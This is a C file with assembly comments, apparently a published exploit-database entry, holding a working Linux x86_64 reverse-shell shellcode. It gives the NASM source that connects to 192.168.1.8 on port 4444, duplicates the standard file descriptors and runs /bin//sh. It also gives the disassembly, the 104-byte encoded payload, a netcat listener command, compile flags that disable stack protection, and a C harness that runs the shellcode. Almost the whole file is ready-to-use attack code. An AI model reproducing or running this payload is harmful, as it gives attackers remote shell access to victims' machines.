/*
;Category: Shellcode
;Title: GNU/Linux x86_64 - Reverse Shell Shellcode
;Author: m4n3dw0lf
;Github: https://github.com/m4n3dw0lf
;Date: 18/07/2017
;Architecture: Linux x86_64
;Tested on: #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux
##########
# Source #
##########
section .text
global _start
_start:
push rbp
mov rbp,rsp
xor rdx, rdx
push 1
pop rsi
push 2
pop rdi
push 41
pop rax ; sys_socket
syscall
sub rsp, 8
mov dword [rsp], 0x5c110002 ; Port 4444, 4Bytes: 0xPORT + Fill with '0's + 2
mov dword [rsp+4], 0x801a8c0 ; IP Address 192.168.1.8, 4Bytes: 0xIPAddress (Little Endiannes)
lea rsi, [rsp]
add rsp, 8
pop rbx
xor rbx, rbx
push 16
pop rdx
push 3
pop rdi
push 42
pop rax; sys_connect
syscall
xor rsi, rsi
shell_loop:
mov al, 33
syscall
inc rsi
cmp rsi, 2
jle shell_loop
xor rax, rax
xor rsi, rsi
mov rdi, 0x68732f6e69622f2f
push rsi
push rdi
mov rdi, rsp
xor rdx, rdx
mov al, 59
syscall
#################################
# Compile and execute with NASM #
#################################
nasm -f elf64 reverse_tcp_shell.s -o reverse_tcp_shell.o
ld reverse_tcp_shell.o -o reverse_tcp_shell
#########################
# objdump --disassemble #
#########################
reverse_tcp_shell: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 55 push %rbp
400081: 48 89 e5 mov %rsp,%rbp
400084: 48 31 d2 xor %rdx,%rdx
400087: 6a 01 pushq $0x1
400089: 5e pop %rsi
40008a: 6a 02 pushq $0x2
40008c: 5f pop %rdi
40008d: 6a 29 pushq $0x29
40008f: 58 pop %rax
400090: 0f 05 syscall
400092: 48 83 ec 08 sub $0x8,%rsp
400096: c7 04 24 02 00 11 5c movl $0x5c110002,(%rsp)
40009d: c7 44 24 04 c0 a8 01 movl $0x801a8c0,0x4(%rsp)
4000a4: 08
4000a5: 48 8d 34 24 lea (%rsp),%rsi
4000a9: 48 83 c4 08 add $0x8,%rsp
4000ad: 5b pop %rbx
4000ae: 48 31 db xor %rbx,%rbx
4000b1: 6a 10 pushq $0x10
4000b3: 5a pop %rdx
4000b4: 6a 03 pushq $0x3
4000b6: 5f pop %rdi
4000b7: 6a 2a pushq $0x2a
4000b9: 58 pop %rax
4000ba: 0f 05 syscall
4000bc: 48 31 f6 xor %rsi,%rsi
00000000004000bf <shell_loop>:
4000bf: b0 21 mov $0x21,%al
4000c1: 0f 05 syscall
4000c3: 48 ff c6 inc %rsi
4000c6: 48 83 fe 02 cmp $0x2,%rsi
4000ca: 7e f3 jle 4000bf <shell_loop>
4000cc: 48 31 c0 xor %rax,%rax
4000cf: 48 31 f6 xor %rsi,%rsi
4000d2: 48 bf 2f 2f 62 69 6e movabs $0x68732f6e69622f2f,%rdi
4000d9: 2f 73 68
4000dc: 56 push %rsi
4000dd: 57 push %rdi
4000de: 48 89 e7 mov %rsp,%rdi
4000e1: 48 31 d2 xor %rdx,%rdx
4000e4: b0 3b mov $0x3b,%al
4000e6: 0f 05 syscall
#######################
# 104 Bytes Shellcode #
#######################
for i in `objdump -d reverse_tcp_shell | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done
\x55\x48\x89\xe5\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x83\xec\x08\xc7\x04\x24\x02\x00\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x01\x08\x48\x8d\x34\x24\x48\x83\xc4\x08\x5b\x48\x31\xdb\x6a\x10\x5a\x6a\x03\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\x31\xf6\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05
########
# Test #
########
In the asm source:
mov dword [rsp+4], 0x801a8c0 <IP Address (Little Endian) of the host that will receive the shell>
In the host that will receive the shell run:
nc -vvlp 4444
On the target machine:
compile with:
gcc -fno-stack-protector -z execstack reverse_tcp_shell.c -o reverse_tcp_shell
run:
./reverse_tcp_shell
<!> gcc -fno-stack-protector -z execstack reverse_tcp_shell.c -o reverse_tcp_shell
*/
#include <stdio.h>
unsigned char shellcode[] = "\x55\x48\x89\xe5\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x83\xec\x08\xc7\x04\x24\x02\x00\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x01\x08\x48\x8d\x34\x24\x48\x83\xc4\x08\x5b\x48\x31\xdb\x6a\x10\x5a\x6a\x03\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\x31\xf6\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";
main()
{
int (*ret)() = (int(*)())shellcode;
ret();
}